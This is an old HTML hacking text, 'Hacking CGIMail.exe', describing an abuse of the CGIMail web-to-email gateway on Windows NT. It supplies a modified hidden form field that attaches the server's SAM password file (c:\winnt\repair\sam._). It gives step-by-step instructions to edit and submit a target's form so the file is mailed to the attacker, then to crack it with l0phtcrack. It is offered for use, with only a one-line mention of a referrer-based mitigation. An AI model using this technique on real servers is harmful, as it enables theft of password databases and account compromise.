Hacking CGIMail.exe.
423b154aed23b4b6753ab94263562f39e86162a9013ee39b1b5dc066824a104c
<HTML>
<HEAD>
<TITLE>CGIMail</TITLE>
</HEAD>
<BODY BGCOLOR="#ffffff">
<B><P ALIGN="CENTER">CGIMail.exe</P>
<P ALIGN="CENTER"> </P>
</B><P>CGIMail.exe is a Web to e-mail gateway program written by Stalkerlabs for a Win32 platform, that is Windows NT or Windows 95. Basically, you fill in an on-line form and it is e-mailed off. The contents of the form contains the following :</P>
<P> </P>
<P><form action="/scripts/CGImail.exe" method="POST" NAME="TestForm"></P>
<P><input type=hidden name="$File$" value="/scripts/template.txt"></P>
<P><input type=hidden name="$Subject$" value="CGImail Example"></P>
<P><input type=hidden name="$LocationOK$" value="/ok.html"></P>
<P><input type=hidden name="$LocationKO$" value="/ko.html"></P>
<P><input type=hidden name="$To$" value="mnemonix@globalnet.co.uk"></P>
<P><input type=hidden name="$Optional$" value="mmmh, no!"></P>
<P> </P>
<P>There is also another "hidden" input type and this takes the following shape:</P>
<P> </P>
<P><input type=hidden name="$Attach$" value=""></P>
<P> </P>
<P>This allows you to attach a file to the e-mail
.any file the IUSR_COMPUTERNAME account has access to. So if the NT server is poorly configured as far as security is concerned you could put in "c:\winnt\repair\sam._" as the inputs value:</P>
<P> </P>
<P><input type=hidden name="$Attach$" value="c:\winnt\repair\sam._"></P>
<P> </P>
<P>Note Using %windir% wont work you need the full path. </P>
<P> </P>
<P>So heres how the hack would go :</P>
<P>You go to their form page and view the source. Save this source to the desktop and make some editions to it, like put your e-mail address in (use a temporary one!) and put the $Attach$ entry in. Save these changes and then load the new page and click o
n send.</P>
<P>All things going well you should receive a compressed copy of their SAM which you can then get to work on, using l0phtcrack to glean the passwords. </P>
<P> </P>
<P>CGIMail <B><I>can</B></I> be made more secure: the cgimail.ini can be edited so that only certain referrers are accepted but only around 50% of the machines Ive seen with this on have configured it so.</P>
<P> </P>
<P>You can find out more (no-hacking) info about this program from the vendors site:</P>
<P> </P>
<P><A HREF="http://www.stalkerlab.ch/SMailers/index.html">http://www.stalkerlab.ch/SMailers/index.html</A></P>
<P> </P>
</body>
</HTML>